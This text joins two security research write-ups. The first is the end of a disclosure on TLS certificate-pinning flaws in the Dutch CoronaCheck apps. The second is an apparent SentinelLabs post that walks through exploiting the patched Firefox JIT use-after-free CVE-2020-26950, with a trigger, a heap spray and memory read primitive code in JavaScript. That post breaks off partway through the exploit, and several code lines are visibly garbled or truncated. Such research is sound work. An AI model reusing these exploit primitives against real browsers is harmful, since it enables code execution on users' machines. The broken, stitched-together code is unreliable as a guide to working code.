This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificate’s issuer’s key, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144- (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
145
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
149}
150
151- (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
152
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
160
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
163
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
166
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
169
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
172
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
175
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
178
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
180
181errit:
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
186
187	return isMatch;
188}
189
190- (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
191
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
199
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
202
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
205
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
208
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
211
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
214
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
217
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
219
220errit:
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
225
226	return isMatch;
227}

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldn’t completely bypass the certificate validation. This could however still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificates was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of other name types than a domain name, such as an email addresses in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114func compareSan(_ san: String, name: String) -> Bool {
115
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *.domain.nl
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false
127}

For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name, instead it checked that a specific string occurred in the domain (coronacheck.nl) and that it ends with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS sign API responses.

OpenSSL.m lines 259 to 278:

259- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
262    
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
265    
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
270    
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
274    
275    certificateSubjectName = NULL;
276    
277    return hasCorrectSuffix && containsRequiredContent;
278}

The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making also possible to bypass it using coronacheck.nl.example.com.

SignatureValidator.kt lines 94 to 96:

94fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))
96}

SignatureValidator.kt line 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
            cnMatchingRegex.containsMatchIn(cn)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")
    }
}

Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government) certificate, it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were more strict for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed quickly after another, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this can not be used to intercept connections either. However, it was already triggering in normal use, as the app was initiating two requests with different validation rules immediately after starting.

Reporting

We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop of the if we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.

Recommendation

TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.

Conclusion

We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Contents

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i 

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straight forward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Being in the tenured heap means that the ArrayBuffer object itself will be inaccessible as it is in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and have thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing to separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   //
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val = 0; i--) {
       val[0] = val[0] 

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straight forward by iterating backwards from the RareArgumentsData pointer (As ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
